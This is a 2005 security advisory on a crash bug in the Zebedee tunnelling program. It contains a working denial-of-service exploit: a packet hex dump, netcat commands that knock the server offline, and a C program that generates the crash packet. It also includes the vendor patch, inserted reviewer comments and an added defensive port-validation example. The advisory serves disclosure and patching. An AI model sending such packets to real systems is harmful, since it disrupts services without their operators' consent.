[NEWS] Zebedee DoS

Subject: [NEWS] Zebedee DoS
Date: 13 Sep 2005 16:04:58 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Zebedee DoS
------------------------------------------------------------------------


SUMMARY

"Zebedee is a simple program to establish an encrypted, compressed tunnel 
for TCP/IP or UDP data transfer between two systems." 
(<http://www.winton.org.uk/zebedee/>) Lack of proper validation of the 
user-provided port range allows attackers to cause the Zebedee program to 
crash.

DETAILS

Vulnerable Systems:
 * Zebedee version 2.4.1

Immune Systems:
 * Zebedee version 2.4.1a

The server crashes whenever "0" is received as the port number in the 
protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c

The 9th and 10th bytes of the header (the port field) contain 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
 sent 0, rcvd 0

$

In zebedee.c, look at the function makeConnection(), which is called from 
server():

   1703 /* Sanity check */
   1704
   1705 assert(host != NULL && port != 0);
   1706

Here, if the port number is 0, the assertion fails and both the child and 
the parent process stop running.

This issue occurs when no "allowed redirection port" is set (the default).

Vendor Patch:
*** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
--- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
***************
*** 22,28 ****
  */
  
  char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 
ndwinton Exp $";
! #define RELEASE_STR "2.4.1"
  
  #include <stdio.h>
  #include <stdlib.h>
--- 22,28 ----
  */
  
  char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 
ndwinton Exp $";
! #define RELEASE_STR "2.4.1A"
  
  #include <stdio.h>
  #include <stdlib.h>
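Review bot: the release string in `#define RELEASE_STR "2.4.1A"` uses an upper-case suffix while the advisory lists the immune version as 2.4.1a; pick one spelling so that administrators comparing their installed version against the advisory do not mistake a patched build for an unpatched one.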
***************
*** 3936,3941 ****
--- 3936,3950 ----
      assert(AllowedTargets != NULL);
  
      /*
+ ** Port 0 is invalid data in the request packet, never allowed
+ */
+ if (port == 0)
+ {
+ message(0, 0, "request for target port 0 disallowed");
+ return 0;
+ }
+
+ /*
      ** If the address is all zeroes then we will assume the default 
target
      ** host, if any.
      */
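Review bot: the rejection branch logs a fixed string, `message(0, 0, "request for target port 0 disallowed");`, with nothing identifying the requesting peer; include the client address in that log line so an operator can distinguish a single misconfigured client from repeated probing of the server. Placing the `if (port == 0)` check before the default-target handling is the right spot, since it is the only point at which the port reaches makeConnection()'s assert. As a style point, the added lines are flush-left while the surrounding block is indented by four spaces; match the existing indentation.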

Workaround:
Setting up allowed redirection ports will address this issue.
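As an added example (not code from the advisory or from Zebedee itself), the following C program decodes the 28-byte request header shown above and applies the two defences the advisory names: the 2.4.1A rejection of port 0, and the workaround of configuring allowed redirection ports. The field order is the one labelled in the advisory's exploit listing; the struct and function names, the big-endian reading of multi-byte fields, and the allowed-port list are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ZBD_HDR_LEN 28  /* header length shown in the advisory's od dump */

/* Field layout as labelled in the advisory's exploit listing. Multi-byte
 * values are read big-endian (an assumption; consistent with the key
 * length bytes 0x00 0x80 = 128). Names are this example's own. */
struct zbd_request {
    uint16_t version, flags, max_msg, compression;
    uint16_t port;        /* bytes 8-9: requested target port */
    uint16_t key_len;
    uint32_t key_token;
    uint8_t  nonce[8];
    uint32_t target_addr; /* all zeroes = default target host (patch comment) */
};

enum zbd_verdict {
    ZBD_ALLOW = 0,
    ZBD_REJECT_SHORT,            /* fewer than ZBD_HDR_LEN bytes */
    ZBD_REJECT_PORT_ZERO,        /* the vendor's 2.4.1A check */
    ZBD_REJECT_PORT_NOT_ALLOWED  /* the workaround: allowed-port list in force */
};

static uint16_t be16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Decode a header; returns 0 on success, -1 if the buffer is too short. */
int zbd_parse_request(const unsigned char *buf, size_t len, struct zbd_request *out)
{
    if (buf == NULL || out == NULL || len < ZBD_HDR_LEN)
        return -1;
    out->version     = be16(buf + 0);
    out->flags       = be16(buf + 2);
    out->max_msg     = be16(buf + 4);
    out->compression = be16(buf + 6);
    out->port        = be16(buf + 8);
    out->key_len     = be16(buf + 10);
    out->key_token   = be32(buf + 12);
    memcpy(out->nonce, buf + 16, sizeof out->nonce);
    out->target_addr = be32(buf + 24);
    return 0;
}

/* Validate the requested port before anything downstream can assert on it:
 * port 0 is never allowed, and when an allowed-port list is configured the
 * port must appear on it. A NULL or empty list means "no list configured". */
enum zbd_verdict zbd_check_request(const unsigned char *buf, size_t len,
                                   const uint16_t *allowed, size_t n_allowed)
{
    struct zbd_request req;
    size_t i;

    if (zbd_parse_request(buf, len, &req) != 0)
        return ZBD_REJECT_SHORT;
    if (req.port == 0)
        return ZBD_REJECT_PORT_ZERO;
    if (allowed != NULL && n_allowed > 0) {
        for (i = 0; i < n_allowed; i++)
            if (allowed[i] == req.port)
                return ZBD_ALLOW;
        return ZBD_REJECT_PORT_NOT_ALLOWED;
    }
    return ZBD_ALLOW;
}

/* The 28-byte request from the advisory's od dump (port field = 0). */
const unsigned char zbd_sample_port0[ZBD_HDR_LEN] = {
    0x02, 0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x80,
    0xff, 0xff, 0xff, 0xff, 0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74,
    0x00, 0x00, 0x00, 0x00
};

/* Same sample with the port field overwritten (constructed input). */
enum zbd_verdict zbd_check_sample_with_port(uint16_t port, const uint16_t *allowed,
                                            size_t n_allowed)
{
    unsigned char buf[ZBD_HDR_LEN];
    memcpy(buf, zbd_sample_port0, sizeof buf);
    buf[8] = (unsigned char)(port >> 8);
    buf[9] = (unsigned char)(port & 0xff);
    return zbd_check_request(buf, sizeof buf, allowed, n_allowed);
}

int main(void)
{
    static const char *names[] = { "ALLOW", "REJECT_SHORT", "REJECT_PORT_ZERO",
                                   "REJECT_PORT_NOT_ALLOWED" };
    const uint16_t allowed[] = { 80, 443 };  /* constructed allowed-port list */

    printf("advisory packet, no list: %s\n",
           names[zbd_check_request(zbd_sample_port0, ZBD_HDR_LEN, NULL, 0)]);
    printf("port 22, list {80,443}:   %s\n", names[zbd_check_sample_with_port(22, allowed, 2)]);
    printf("port 443, list {80,443}:  %s\n", names[zbd_check_sample_with_port(443, allowed, 2)]);
    return 0;
}
```

The decoder checks the buffer length before touching any field, and the port check runs on the decoded value rather than on the raw bytes, so a later change to the header layout only needs to touch zbd_parse_request(). The allowed-port list reproduces the workaround: with an empty list every non-zero port is accepted, which is exactly the default configuration the advisory says is affected.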

Exploit:
/*
        $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
        $ ./mkZebedeeDoS > zebedeeDoS
        $ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{
        /* unsigned, so that bytes >= 0x80 are not narrowed to negative values */
        unsigned char data[] = {
        0x02, 0x01, // protocol version
        0x00, 0x00, // flags
        0x20, 0x00, // max message size
        0x00, 0x06, // compression info
        0x00, 0x00, // port request: value = 0x0
        0x00, 0x80, // key length
        0xff, 0xff, 0xff, 0xff, // key token
        0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
        0x00, 0x00, 0x00, 0x00 // target host address
         };

        (void)argc;
        (void)argv;

        /* write the 28 raw bytes to stdout; sizeof avoids a hard-coded length */
        fwrite(data, 1, sizeof data, stdout);

        return 0;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by Shiraishi.M. 
<mailto:shiraishi@insi.co.jp>.


